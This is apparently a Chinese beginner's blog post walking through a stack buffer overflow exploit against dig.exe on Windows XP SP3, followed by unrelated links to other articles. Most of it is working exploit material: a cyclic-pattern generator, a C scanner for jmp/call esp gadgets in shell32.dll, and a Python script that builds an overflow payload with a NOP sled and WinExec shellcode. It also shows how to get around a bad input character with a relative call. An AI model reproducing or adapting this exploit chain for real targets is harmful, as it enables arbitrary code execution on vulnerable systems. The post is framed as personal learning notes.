• winXP SP3 环境 (xp环境默认没开启栈不可执行机制,比较方便破解,如果已开启了,请自行百度如何关闭)
  • dig.exe 目标文件
  • x86dbg调试工具
  • python 环境

打开准备好的目标软件 dig.exe

映入眼帘的有两个输入框,可以直接从键盘获取输入

第一个输入框应该是输入域名的,TCP lookup按钮查询此域名的各种信息

猜想,这个输入框1 中输入的文本可能保存在栈区中的临时变量里,毕竟域名都不太长

  • 直接在输入框里输入1100个 'A' 然后点击 TCP lookup 看看有什么现象

  • 哈哈,软件崩溃退出了!!

  • 使用x86dbg 加载运行 dig.exe ,再输入1100个有序字符

      CH=65
    
  ch=97
    
  num_1=48

  buf=''
    
  n_C=0
    
  n_c=0
    
  n_1=0

  for i in range(1100//3):
    
      if n_1>9:
    
          n_c+=1
    
          n_1=0
    
          if n_c > 25:
    
              n_C+=1
    
              n_c=0
    
      buf += chr(CH+n_C)+chr(ch+n_c)+chr(num_1+n_1)
    
      n_1+=1

  print(buf)

  • 把生成的字符串复制到输入框1 中,看看崩溃点在哪

  • 这个eip是什么?肯定是我们输入的字符串的ASCII码

      int main()
    
  {
    
  	char str[10] = { 0 };
    
  	scanf_s("%x", (int)str);//输入eip的值
    
  	puts(str);
    
  }

    哦,原来是'h2Bh'啊

  • 在python 生成的字符串中找到'h2Bh'的位置

      buf.find('h2Bh')

    997,输入997个字符后字符串将覆盖eip

  • 测试,运行计算器(当然你也可以是运行其他)

    1. 找到自己电脑中 WinExeC 函数的地址(方法自行百度)如果嫌麻烦,你可以自己写一个带有winexec函数的测试程序,用od看winexec函数的地址

    2. 找到程序中 jmp esp 或 call esp的指令

      可以使用OllyUni.dll 这个OD插件寻找,不过寻找过程太慢,在我的测试中竟然运行了足足5分钟......这种时长不能忍!!!!

       #include <windows.h>
      
 #include <stdio.h>
      
 #define DLL_NAME L"shell32.dll"
      
 int main()
      
 {
      
 	HINSTANCE handle = LoadLibrary(DLL_NAME);
      
 	if (!handle)
      
 	{
      
 		printf(" load dll erro !");
      
 		exit(0);
      
 	}
      
 	int address;
      
 	BYTE* ptr = (BYTE*)handle;
      
 	FILE *fp = fopen("shell32.txt", "w+");
      
 	fprintf(fp, "shell32.dll\t语句\t\t地址\t\t偏移\t\t基地址\n");
      
 	for (int position = 0; position < 12*1024*1024; position++)
      
 	{
      
 		if (ptr[position] == 0xFF)
      
 		{
      
 			if (ptr[position + 1] == 0xE4)
      
 			{
      
 				int address = (int)ptr + position;
      
 				fprintf(fp, "shell32.dll <jmp esp>\t%#x\t%#-8x\t%#x\n", address, position, ptr);
      
 			}
      
 			else if (ptr[position + 1] == 0xD4)	//jmp esp
      
 			{
      
 				int address = (int)ptr + position;
      
 				fprintf(fp, "shell32.dll <call esp>\t%#x\t%#-8x\t%#x\n", address, position, ptr);
      
 			}
      
 			else{}
      
 		}
      
 	}

 	fclose(fp);
      
 	return 0;
      
 }

    自己写个程序找shell32.dll中的指令

    1. 在eip后写程序,并且让他执行

       # -*- coding: UTF-8 -*-
      
 #我的电脑中    7C86250D  kernel32.WinExec
      
 import struct
      
 junk = "A" * 997    #偏移

 eip = '\x73\x15\xbf\x7d'    #shell32.dll <call esp>	0x7dbf1573

 nops = "\x90" * 10    #10字节NOP
      
 fill = "\x43" * 10	#无用指令,测试时主要用于让自己看清shellcode结束了

 #shellcode 要执行的代码
      
 shellcode = "\x31\xC9"                    # xor ecx,ecx
      
 shellcode += "\x51"                       # push ecx
      
 shellcode += "\x68\x63\x61\x6C\x63"        # push 0x636c6163
      
 shellcode += "\x54"                      # push dword ptr esp
      
 shellcode += "\xBB\x0D\x25\x86\x7C"        # mov ebx,7C86250D
      
 shellcode += "\xFF\xD3"                     # call ebx
      
 #payload
      
 payload = junk + eip + nops + shellcode+fill
      
 #将payload写入到文件payload.txt
      
 fp = open("payload.txt","w")
      
 fp.write(payload)
      
 fp.close()
      
 print "[+]Exploit successfully!"

  • 把生成的文件内容复制到 输入框1 中,是不是程序退出了,但计算器成功运行了?

  • 或许这一步你成功了,但我还没有,为什么呢????因为系统原因,winexec函数的地址在我们的电脑中的位置是不一样的

  •   #我的电脑中    7C86250D  kernel32.WinExec

    看没看到这个 7C86250D 中的 0D ?这是不会被输入到输入框的,输入框里并不是什么字符都可以被输入的,怎么办呢?这可是我电脑中winexec的地址啊!!!!

请注意 技术性的时刻即将到来了...

  • 在x86dbg中直接输入 call 7C86250D 你会发现,咦?这机器码怎么与我输入的不一样呢?

  • 因为人家使用的是相对 winexec 函数的地址

  • 那么把自己的shellcode中也改成这样的地址不就好了!!

      #shellcode 要执行的代码
    
  shellcode = "\x31\xC9"                    # xor ecx,ecx
    
  shellcode += "\x51"                       # push ecx
    
  shellcode += "\x68\x63\x61\x6C\x63"        # push 0x636c6163
    
  shellcode += "\x54"                      # push dword ptr esp
    
  shellcode += "\xe8\xd8\x25\xb1\x7b"         #call winexec 这里啊,相对地址
    
  '''
    
  shellcode += "\xBB\x0D\x25\x86\x7C"        # mov ebx,7C86250D
    
  shellcode += "\xFF\xD3"                     # call ebx
    
  '''

OMG,成功了!!

你可能会遇到的问题

  1. 你可能自己找 jmp esp 时的地址无法写入到 eip 中,要么是少了两位,要么是多了两们,不要气馁,你找到的地址不止一个 而是好几百个,可能这个地址中刚好有输入框中不可输入的字符,换个地址试试,如果不行,就再换
  2. 或许你在一开始就遇到的问题,复制的与字符串大部分都与 shellcode中的不一样,别着急,你试试把生成的字符串文件用 notpad++ 打开,或者 UltarEdit 会更好一些
  3. 遇到百度无法解决的问题,你还有最后两种强大的依靠,就是你的智慧与坚持

我是新手,如果文中有错误,请批评或指正,谢谢

shellcode 初次使用笔记的更多相关文章

  1. DataTable初次使用笔记

    概述:DataTable是一个jQuery插件,用于生成HTML表格,功能很强大. 使用: 使用DataTable需要引入jQuery,因为他是基于jQuery的插件,然后引入DataTable的js ...

  2. 20145330《Java学习笔记》第一章课后练习8知识总结以及IDEA初次尝试

    20145330<Java学习笔记>第一章课后练习8知识总结以及IDEA初次尝试 题目: 如果C:\workspace\Hello\src中有Main.java如下: package cc ...

  3. KTHREAD 线程调度 SDT TEB SEH shellcode中DLL模块机制动态获取 《寒江独钓》内核学习笔记(5)

    目录 . 相关阅读材料 . <加密与解密3> . [经典文章翻译]A_Crash_Course_on_the_Depths_of_Win32_Structured_Exception_Ha ...

  4. Spring Cloud学习笔记--Spring Boot初次搭建

    1. Spring Boot简介 初次接触Spring的时候,我感觉这是一个很难接触的框架,因为其庞杂的配置文件,我最不喜欢的就是xml文件,这种文件的可读性很不好.所以很久以来我的Spring学习都 ...

  5. Django笔记-MySQL初次使用设置

    以下为个人学习时的笔记,正在完善中........... [1]启动服务 [root@bogon /]# service mysqld start正在启动 mysqld: [确定] [root@bog ...

  6. 初次使用InstallShield笔记

    公司的产品需要打包发布,以前一直没打包,打包方法的学习交给了我 下面的内容是我研究过后的,通过回忆写的笔记.由于不熟悉,可能会有错误或者是笨办法,希望高手指正,感激不尽. 有些东西是什么,以及是什么意 ...

  7. 初次使用Docker的体验笔记

    一.前言 Docker容器已经发布许久,但作为一名程序员如今才开始接触,实在是罪过--        在此之前,我还没有对Docker进行过深入的了解,对它的认识仍停留在:这是一种新型的虚拟机.这样的 ...

  8. Hibernate笔记——Hibernate介绍和初次环境配置

    Hibernate简介 Hibernate是一个开放源代码的对象关系映射框架,它对JDBC进行了非常轻量级的对象封装,使得Java程序员可以随心所欲的使用对象编程思维来操纵数据库. Hibernate ...

  9. Struts2笔记——初次框架配置

    1.Struts2简介   Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架.其全新的Struts 2的体系结构与S ...

随机推荐

  1. 参数innodb_force_recovery影响了整个InnoDB存储引擎的恢复状况

    参数innodb_force_recovery影响了整个InnoDB存储引擎的恢复状况.该值默认为0,表示当需要恢复时执行所有的恢复操作.当不能进行有效恢复时,如数据页发生了corruption,My ...

  2. C#调用免费天气预报WebService

    using System; using System.Collections; using System.Configuration; using System.Data; using System. ...

  3. linux开机步骤

    linux开机启动步骤: 1.bios自检 2.MBR引导 3.引导系统,进入grub菜单 4.加载内核kernel 5.运行第一个进程init 6.读取/etc/inittab 读取运行级别 7.读 ...

  4. 第六次作业 orm整合 接口

    结合以前一个项目,将普通的jdbc进行了相关整合,全部改写成了hibernate接口 项目名称:短视频分享平台 主要功能:用户模块:注册.登录.编辑资料.查看用户相关 分类模块:分类添加.查看 视频共 ...

  5. vcenter server appliance(vcsa) 配置IP的方法

    方法一: vcenter server appliance 5.1 及以后版本包括5.5,在安装完毕后,console界面是没有网络配置项的,如果需要进行IP配置,可以login后,输入命令yast( ...

  6. 乘风破浪:LeetCode真题_033_Search in Rotated Sorted Array

    乘风破浪:LeetCode真题_033_Search in Rotated Sorted Array 一.前言     将传统的问题进行一些稍微的变形,这个时候我们可能无所适从了,因此还是实践出真知, ...

  7. 用JS制作《飞机大作战》游戏_第2讲(四大界面之间的跳转与玩家飞机的移动)-陈远波

    一.通过点击按钮事件,实现四大界面之间的跳转: (一)跳转的思路: 1.打开软件,只显示登录界面(隐藏游戏界面.暂停界面.玩家死亡界面) 2.点击微信登录(QQ登录)跳转到游戏界面,隐藏登录界面 3. ...

  8. eclipse中文版官方下载

    目前eclipse的使用已经越来越广泛,它不仅应用于Java开发中,对于C++开发.php开发的程序员们也是非常喜爱.eclipse中文版下载其实是eclipse官方网站提供的中文包,默认情况下ecl ...

  9. Dubbo -- 系统学习 笔记 -- 配置

    Dubbo -- 系统学习 笔记 -- 目录 配置 Xml配置 属性配置 注解配置 API配置 配置 Xml配置 配置项说明 :详细配置项,请参见:配置参考手册 API使用说明 : 如果不想使用Spr ...

  10. VS2010自行编译OpenCV2.4.4时缺少python27_d.lib的解决方法

    错误 24 error LNK1104: 无法打开文件“python27_d.lib”  C:\OpenCV\VS2013_64\modules\python\LINK opencv_python 编 ...